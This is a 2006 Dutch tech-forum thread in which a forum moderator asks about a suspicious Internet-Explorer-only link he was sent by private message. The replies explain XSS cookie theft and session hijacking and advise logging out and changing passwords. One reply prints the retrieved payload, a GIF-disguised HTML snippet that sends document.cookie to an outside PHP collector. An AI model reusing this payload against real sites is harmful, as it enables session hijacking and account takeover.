Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien

[IE] Exploitable link via PM op een forum gekregen? *

Pagina: 1
Acties:

  • ToolkiT
  • Registratie: Februari 2004
  • Niet online

ToolkiT

brit-tweaker

Topicstarter
Ik ben moderator op treocentral.com en kreeg een vaag PMetje daar.
i found this security hole in the forum

http://discuss.treocentral.com/imag...line=1147042835

(MUST VIEW IN INERNET EXPLORER)

i hope you really are an admin.
link in PM is: *knip* wat er niet uit ziet als een verhulde URL ofzo, dus was ik zo suf om er op te klikken..
En kreeg een of andere page met wat rommel tekens en een pop up met 'owned'

Is dit een bekende hacking methode?
Kunnen ze er kwaad mee?

klikken op link uiteraard op eigen risico...

[ Voor 9% gewijzigd door pasta op 09-05-2006 23:49 ]

Mag je een gegeten paard in de bek kijken?


  • Bor
  • Registratie: Februari 2001
  • Nu online

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

Het feit dat men al aangeeft "must viewed in internet explorer". Dan gaan hier direct al alarm belletjes rinkelen hoor. Waarschijnlijk proberen ze een security hole in IE te exploiten wat alleen kan wanneer jij de gevraagde pagina met exploitcode opvraagt.

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum


  • Twee Dee
  • Registratie: Juli 2002
  • Laatst online: 09:12

Twee Dee

Morgen weer een ondertitel.

Is het wel zo handig om hier dan naar die pagina te linken?

Luister nou gewoon naar me, dat voorkomt dat ik later "zie je wel" moet zeggen.


  • ToolkiT
  • Registratie: Februari 2004
  • Niet online

ToolkiT

brit-tweaker

Topicstarter
Bor de Wollef schreef op dinsdag 09 mei 2006 @ 22:23:
Het feit dat men al aangeeft "must viewed in internet explorer". Dan gaan hier direct al alarm belletjes rinkelen hoor. Waarschijnlijk proberen ze een security hole in IE te exploiten wat alleen kan wanneer jij de gevraagde pagina met exploitcode opvraagt.
klopt, dat bedacht ik me achteraf ook |:( even een suf momentje..
Vraag me alleen af wat de schade is en hoe ze het doen..

Mag je een gegeten paard in de bek kijken?


  • Jokuh
  • Registratie: September 2005
  • Laatst online: 28-11 12:31
ow kut.. ik heb op de link geklik.. er stond schermpje met owned... ben ik nu genaaid?

  • geez
  • Registratie: Juni 2002
  • Laatst online: 25-10 16:40
Bor de Wollef schreef op dinsdag 09 mei 2006 @ 22:23:
Het feit dat men al aangeeft "must viewed in internet explorer". Dan gaan hier direct al alarm belletjes rinkelen hoor. Waarschijnlijk proberen ze een security hole in IE te exploiten wat alleen kan wanneer jij de gevraagde pagina met exploitcode opvraagt.
^^^ with stupid :)

edit:
traag :/

[ Voor 6% gewijzigd door geez op 09-05-2006 22:26 ]


  • ToolkiT
  • Registratie: Februari 2004
  • Niet online

ToolkiT

brit-tweaker

Topicstarter
Twee Dee schreef op dinsdag 09 mei 2006 @ 22:25:
Is het wel zo handig om hier dan naar die pagina te linken?
ik neem aan als jij als niet lid er op klikt er weinig mis kan gaan, en door het te posten weet misschien iemand wat hun truck is..

Hij vroeg trouwens om een admin, niet een mod. dus misschien is er nog niks mis...

Mag je een gegeten paard in de bek kijken?


  • Bertus
  • Registratie: Augustus 2003
  • Niet online
Jokuh schreef op dinsdag 09 mei 2006 @ 22:25:
ow kut.. ik heb op de link geklik.. er stond schermpje met owned... ben ik nu genaaid?
Ja.

Verander iig snel je wachtwoord etc. :)

Heeft ook een computer!


  • hendrikjan
  • Registratie: Mei 2001
  • Niet online

hendrikjan

VOORMALIG STUNTMAN

ik heb ff glickt en dit is de code

code:
1
GIF89al><html><head><style>.getcookies{background-image:url('javascript:new Image().src="http://49mb.com/cookies/cookies.php?c="+encodeURI(document.cookie);');}</style><p class="getcookies"></p><script>alert('owned');</script></head></html>


bij mij stond er verder niks .. maar ik ging met faiafox kijken :)

[ Voor 31% gewijzigd door hendrikjan op 09-05-2006 22:28 ]


  • Jokuh
  • Registratie: September 2005
  • Laatst online: 28-11 12:31
uhmm?? welk wachtwoord? f*ck! nu durf ik niet te gaan slapen... :o

[ Voor 51% gewijzigd door Jokuh op 09-05-2006 22:30 ]


  • 84n44n
  • Registratie: April 2003
  • Laatst online: 13-11-2012
Het scriptje probeert een of andere cookie te stelen, maar ik zie niet goed van welk domein..

  • Bertus
  • Registratie: Augustus 2003
  • Niet online
Jokuh schreef op dinsdag 09 mei 2006 @ 22:27:
uhmm?? welk wachtwoord? f*ck! nu durf ik niet te gaan slapen... :o
van je account op dat forum

Heeft ook een computer!


  • MadMarky
  • Registratie: Augustus 2001
  • Niet online

MadMarky

Begint eer ge bezint

84n44n schreef op dinsdag 09 mei 2006 @ 22:31:
Het scriptje probeert een of andere cookie te stelen, maar ik zie niet goed van welk domein..
Dat weet je ook niet, want dat staat in een php scriptje.

🖥️ | 🚗


  • Pascal
  • Registratie: Januari 2001
  • Laatst online: 30-11 19:11
84n44n schreef op dinsdag 09 mei 2006 @ 22:31:
Het scriptje probeert een of andere cookie te stelen, maar ik zie niet goed van welk domein..
denk van het domain: discuss.treocentral.com omdat vandaar ook het "script" wordt geladen...

  • Jokuh
  • Registratie: September 2005
  • Laatst online: 28-11 12:31
Bertus schreef op dinsdag 09 mei 2006 @ 22:33:
[...]


van je account op dat forum
Ik heb geen account op dat forum... Ik heb alleen op de link geklikt.
Kan er nu iets gebeuren met accounts zoals msn? of als tweakers?

[ Voor 14% gewijzigd door Jokuh op 09-05-2006 22:38 ]


  • Morax
  • Registratie: Mei 2002
  • Laatst online: 12:18
Het scriptje lijkt al je coookies te stelen. Wachtwoorden ben je waarschijnlijk niet kwijt, maar het lijkt me zeer verstanding alle sessies op fora en sites die je open hebt staan uit te loggen, en weer compleet opnieuw in te loggen.

Met behulp van bijvoorbeeld je ReactID hier op GoT die in een cookie word gezet kan je sessie overgenomen worden door iemand (waardoor hij dus effectief ingelogd is onder jouw account). Dus zeker als je ergens moderator of admin bent, raad ik je aan al je openstaande sessies te beëindigen :)

[ Voor 3% gewijzigd door Morax op 09-05-2006 22:39 ]

What do you mean I have no life? I am a gamer, I got millions!


  • hendrikjan
  • Registratie: Mei 2001
  • Niet online

hendrikjan

VOORMALIG STUNTMAN

Morax schreef op dinsdag 09 mei 2006 @ 22:38:
Het scriptje lijkt al je coookies te stelen. Wachtwoorden ben je waarschijnlijk niet kwijt, maar het lijkt me zeer verstanding alle sessies op fora en sites die je open hebt staan uit te loggen, en weer compleet opnieuw in te loggen.

Met behulp van bijvoorbeeld je ReactID hier op GoT die in een cookie word gezet kan je sessie overgenomen worden door iemand (waardoor hij dus effectief ingelogd is onder jouw account). Dus zeker als je ergens moderator of admin bent, raad ik je aan al je openstaande sessies te beëindigen :)
toch wel weer belabberd dat dat zo makkelijk is ....

  • ToolkiT
  • Registratie: Februari 2004
  • Niet online

ToolkiT

brit-tweaker

Topicstarter
Dus cookies deleten, uitloggen, nieuw password moet genoeg zijn als oplossing?

Mag je een gegeten paard in de bek kijken?


  • frickY
  • Registratie: Juli 2001
  • Laatst online: 13:11
Het is voor een site onmogelijk om cookies van andere domeinen uit te lezen.
Dit is gewoon een poging tot sesison-hijacking.

Als zij jou sessie ID hebben (die staati n het cookie) kunnen ze die in hun eigen cookie zetten, en zijn ze spontaan ingelogt met jowu account (als je sessie verder niet IP gebonden is).
Als jij admin bent op dat forum, waar ze in de pm specifiek naar vragen, dan zijn zij dat nu dus ook.

Wachtwoord wijzigen en uitloggen. Afhankelijk van hoe het systeem werkt wordt de sessie vernietigd, en is het sessieID niet meer geldig (zoals hier op GoT _/-\o_ )

  • Jokuh
  • Registratie: September 2005
  • Laatst online: 28-11 12:31
Tja ik heb al cookies delete en uitgezet dus.. Nu durf ik weer te slapen en ik kijk morgen wel verder voor instructies op dit topic.

Laterrrr

  • Morax
  • Registratie: Mei 2002
  • Laatst online: 12:18
ToolkiT schreef op dinsdag 09 mei 2006 @ 22:45:
Dus cookies deleten, uitloggen, nieuw password moet genoeg zijn als oplossing?
Meer dan genoeg :)
Jokuh schreef op dinsdag 09 mei 2006 @ 22:49:
Tja ik heb al cookies delete en uitgezet dus.. Nu durf ik weer te slapen en ik kijk morgen wel verder voor instructies op dit topic.

Laterrrr
Er valt niet meer te doen dan wat ToolkiT hierboven schrijft ;)

What do you mean I have no life? I am a gamer, I got millions!


  • ToolkiT
  • Registratie: Februari 2004
  • Niet online

ToolkiT

brit-tweaker

Topicstarter
ok, cool.

Bedankt voor de feedback :)

Mag je een gegeten paard in de bek kijken?


  • Bor
  • Registratie: Februari 2001
  • Nu online

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

Jokuh schreef op dinsdag 09 mei 2006 @ 22:49:
Tja ik heb al cookies delete en uitgezet dus.. Nu durf ik weer te slapen en ik kijk morgen wel verder voor instructies op dit topic.

Laterrrr
Alleen cookies deleten is onvoldoende hoor. Je zult de accounts ook echt moeten uitloggen (en hopen dat men de verkregen info niet al heeft gebruikt om je accounts aan te passen zoals bv het bij de accounts behorende mail adres wijzigen waardoor je zelfs access blijft houden wanneer jij uitlogd (gewoon nieuw wachtwoord opvragen).

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum


  • pasta
  • Registratie: September 2002
  • Laatst online: 12-01 14:16

pasta

Ondertitel

Ik heb de link toch maar verwijderd, voor de mensen die ook een account hadden op dat forum. ;)

Verder voer ik nog even een titelfixje uit. :)

Signature


  • MadMarky
  • Registratie: Augustus 2001
  • Niet online

MadMarky

Begint eer ge bezint

Volgens mij is dat php scriptje uit die url al lang niet meer bereikbaar, het lukte me iig niet om hem te downloaden.

🖥️ | 🚗


  • AW_Bos
  • Registratie: April 2002
  • Nu online

AW_Bos

Liefhebber van nostalgie... 🕰️

Ik weet niet wat voor forumsoftware het is, maar ik raad wel de TS aan om eens met de admins van zijn forumte overleggen voor een forum-software-update.

Want XXS is niet zo leuk inderdaad.

Telecommunicatie van vroeger
🚅Alles over spoor en treintjes


  • ToolkiT
  • Registratie: Februari 2004
  • Niet online

ToolkiT

brit-tweaker

Topicstarter
AW_Bos schreef op donderdag 11 mei 2006 @ 22:28:
Ik weet niet wat voor forumsoftware het is, maar ik raad wel de TS aan om eens met de admins van zijn forumte overleggen voor een forum-software-update.

Want XXS is niet zo leuk inderdaad.
Ik heb ze op de hoogte gesteld van het gebeuren.. dus de bal ligt bij hun..
Maar aangezien ik geen admin ben daar kan er denk ik weinig kwaad..

Mag je een gegeten paard in de bek kijken?

Pagina: 1